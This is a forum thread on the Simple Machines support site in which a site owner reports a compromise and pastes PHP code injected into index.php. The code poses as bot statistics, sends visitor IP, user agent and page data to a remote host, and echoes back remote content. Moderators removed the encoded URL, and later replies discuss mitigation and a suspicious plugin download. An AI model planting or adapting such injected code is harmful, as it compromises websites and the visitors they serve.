News:

Wondering if this will always be free?  See why free is better.

Main Menu

Nasty, Hidden Virus on Simple Machines

Started by Flavious, October 06, 2011, 04:47:06 PM

Previous topic - Next topic

OCJ

Update ... hacked again.

Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.

<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;

// This code use for global bot statistic

$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

$stCurlHandle NULL;

$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes

{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            

$stCurlLink base64_decode'{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{

curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);

curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);

$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end

}

curl_close($stCurlHandle); 
}
}
?>

(edit: removed base64 string to render code (semi-)unusable)

nend

If you decode the base64 that is in the script you end up with this url.

http://{snap}.com/stat/stat.php

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子

You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

NanoSector

I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Robert.

Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

青山 素子

Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

That only  works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

OCJ

update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didnt work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.

I know some so called free firefox plugins from dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^

Advertisement: